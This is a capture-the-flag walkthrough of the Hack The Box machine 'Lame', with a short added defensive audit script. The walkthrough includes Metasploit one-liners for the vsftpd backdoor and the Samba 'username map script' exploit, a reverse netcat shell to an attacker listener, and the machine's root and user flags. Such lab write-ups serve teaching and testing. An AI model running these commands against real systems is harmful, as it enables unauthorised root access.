About

Lame is a beginner level machine, requiring only one exploit to obtain root access. It was the first machine published on Hack The Box and was often the first machine for new users prior to its retirement.

Enumeration

Running the script portscan.sh reveals three available attack vectors: FTP, SSH and SMB.

┌──(m0nk3y@kali)-[~/HTB/Lame]
└─$ sudo portscan.sh 10.129.66.233

┌──(m0nk3y@kali)-[~/HTB/Lame]
└─$ cat PortScan\(10.129.66.233\)

PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 10.10.16.9
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open              Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: mean: 2h00m27s, deviation: 2h49m45s, median: 25s
| smb-os-discovery:
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name:
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2023-09-01T15:39:06-04:00

Exploitation

FTP

I’ll first check whether the FTP service can be exploited. searchsploit-prettify.py shows that vsftpd 2.3.4 is affected by vsftpd 2.3.4 - Backdoor Command Execution.

┌──(m0nk3y@kali)-[~/HTB/Lame]
└─$ searchsploit-prettify.py 'vsftpd 2.3.4'
 -------------------------------------------------------- ----------------------------------------------------
| Exploit Title                                          | Path                                               |
 -------------------------------------------------------- ----------------------------------------------------
| vsftpd 2.3.4 - Backdoor Command Execution (Metasploit) | /usr/share/exploitdb/exploits/unix/remote/17491.rb |
| vsftpd 2.3.4 - Backdoor Command Execution              | /usr/share/exploitdb/exploits/unix/remote/49757.py |
 -------------------------------------------------------- ----------------------------------------------------

However, exploitation using the Metasploit module failed for an unknown reason.

┌──(m0nk3y@kali)-[~/HTB/Lame]
└─$ msfconsole -q -x 'use exploit/unix/ftp/vsftpd_234_backdoor; set RHOSTS 10.129.66.233; set RPORT 21; run'
[*] Starting persistent handler(s)...
[*] No payload configured, defaulting to cmd/unix/interact
RHOSTS => 10.129.66.233
RPORT => 21
[*] 10.129.66.233:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.129.66.233:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.

SMB

Next, I’ll check the SMB service. With smbmap, I find a share named tmp that grants both read and write permission to the guest account.

┌──(m0nk3y@kali)-[~/HTB/Lame]
└─$ smbmap -H 10.129.66.233
[+] IP: 10.129.66.233:445	Name: 10.129.66.233
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	print$                                            	NO ACCESS	Printer Drivers
	tmp                                               	READ, WRITE	oh noes!
	opt                                               	NO ACCESS
	IPC$                                              	NO ACCESS	IPC Service (lame server (Samba 3.0.20-Debian))
	ADMIN$                                            	NO ACCESS	IPC Service (lame server (Samba 3.0.20-Debian))

Using an empty username and password, I’m able to list the contents of the tmp share, but there doesn’t seem to be anything interesting in it.

┌──(m0nk3y@kali)-[~/HTB/Lame]
└─$ smbclient //10.129.66.233/tmp -U ''
Password for [WORKGROUP\]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Sep  1 15:55:42 2023
  ..                                 DR        0  Sat Oct 31 02:33:58 2020
  .ICE-unix                          DH        0  Fri Sep  1 15:31:06 2023
  vmware-root                        DR        0  Fri Sep  1 15:32:29 2023
  5588.jsvc_up                        R        0  Fri Sep  1 15:32:19 2023
  .X11-unix                          DH        0  Fri Sep  1 15:31:32 2023
  .X0-lock                           HR       11  Fri Sep  1 15:31:32 2023
  vgauthsvclog.txt.0                  R     1600  Fri Sep  1 15:31:03 2023

		7282168 blocks of size 1024. 5385856 blocks available

Since I identified the SMB service as Samba smbd 3.0.20-Debian during enumeration, I’ll run searchsploit again to check for known vulnerabilities. The results show that the service may be vulnerable to Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit).

┌──(m0nk3y@kali)-[~/HTB/Lame]
└─$ searchsploit-prettify.py 'Samba 3.0.20'
 ---------------------------------------------------------------------------------- ---------------------------------------------------------
| Exploit Title                                                                    | Path                                                    |
 ---------------------------------------------------------------------------------- ---------------------------------------------------------
| Samba 3.0.10 < 3.3.5 - Format String / Security Bypass                           | /usr/share/exploitdb/exploits/multiple/remote/10095.txt |
| Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit) | /usr/share/exploitdb/exploits/unix/remote/16320.rb      |
| Samba < 3.0.20 - Remote Heap Overflow                                            | /usr/share/exploitdb/exploits/linux/remote/7701.txt     |
| Samba < 3.6.2 (x86) - Denial of Service (PoC)                                    | /usr/share/exploitdb/exploits/linux_x86/dos/36741.py    |
 ---------------------------------------------------------------------------------- ---------------------------------------------------------
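As an added example (not part of the original writeup), the Python script below turns the Nmap, smbmap and searchsploit findings above into a remediation list for a defender: anonymous FTP, SMB message signing disabled, a guest-writable share, and a Samba version inside the 3.0.20 < 3.0.25rc3 range searchsploit lists for the 'Username map script' issue. The scan excerpts are constructed from the output shown on this page, and the version comparison treats a final release as newer than any of its release candidates, so 3.0.25rc1 is flagged while 3.0.25 is not.

```python
import math
import re

# Constructed excerpts of the Nmap and smbmap output shown earlier on this page.
NMAP_OUTPUT = """\
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
445/tcp  open              Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
|_  message_signing: disabled (dangerous, but default)
"""
SMBMAP_OUTPUT = """\
\tprint$                                            \tNO ACCESS\tPrinter Drivers
\ttmp                                               \tREAD, WRITE\toh noes!
"""
# searchsploit lists the 'Username map script' issue for Samba 3.0.20 < 3.0.25rc3.
# Versions are (major, minor, patch, rc); a final release gets rc=inf so it sorts
# after every release candidate carrying the same number.
USERMAP_LOW = (3, 0, 20, 0)
USERMAP_HIGH = (3, 0, 25, 3)

def parse_samba_version(text):
    """Samba version tuple from an Nmap service line, or None if absent."""
    m = re.search(r"Samba smbd (\d+)\.(\d+)\.(\d+)(?:rc(\d+))?", text)
    if not m:
        return None
    rc = int(m.group(4)) if m.group(4) else math.inf
    return (int(m.group(1)), int(m.group(2)), int(m.group(3)), rc)

def in_usermap_range(version):
    return version is not None and USERMAP_LOW <= version < USERMAP_HIGH

def guest_writable_shares(smbmap_text):
    # smbmap columns are tab separated: share, permissions, comment.
    shares = []
    for line in smbmap_text.splitlines():
        cols = [c.strip() for c in line.split("\t") if c.strip()]
        if len(cols) >= 2 and "WRITE" in cols[1]:
            shares.append(cols[0])
    return shares

def audit(nmap_text, smbmap_text):
    """Turn the two scan outputs into findings a defender should remediate."""
    findings = []
    if "Anonymous FTP login allowed" in nmap_text:
        findings.append("ftp: anonymous login enabled")
    if "message_signing: disabled" in nmap_text:
        findings.append("smb: message signing disabled")
    if in_usermap_range(parse_samba_version(nmap_text)):
        findings.append("smb: Samba version in 'username map script' range")
    for share in guest_writable_shares(smbmap_text):
        findings.append(f"smb: share '{share}' writable by guest")
    return findings
```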

Running the Metasploit module found above gives me a shell as the user root.

┌──(m0nk3y@kali)-[~/HTB/Lame]
└─$ msfconsole -q -x 'use exploit/multi/samba/usermap_script; set RHOSTS 10.129.66.233; set RPORT 139; set LHOST 10.10.16.9; set LPORT 4444; run'
[*] Starting persistent handler(s)...
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
RHOSTS => 10.129.66.233
RPORT => 139
LHOST => 10.10.16.9
LPORT => 4444
[*] Started reverse TCP handler on 10.10.16.9:4444
[*] Command shell session 1 opened (10.10.16.9:4444 -> 10.129.66.233:44752) at 2023-09-01 16:02:08 -0400

id
uid=0(root) gid=0(root)

Post Exploitation

With the shell acquired, I’m able to read the flags user.txt and root.txt.

cat /home/makis/user.txt
306255bad37d2b72b0b62190df77433f

cat /root/root.txt
0cfaa15d79fc9971a427c3fcc95868da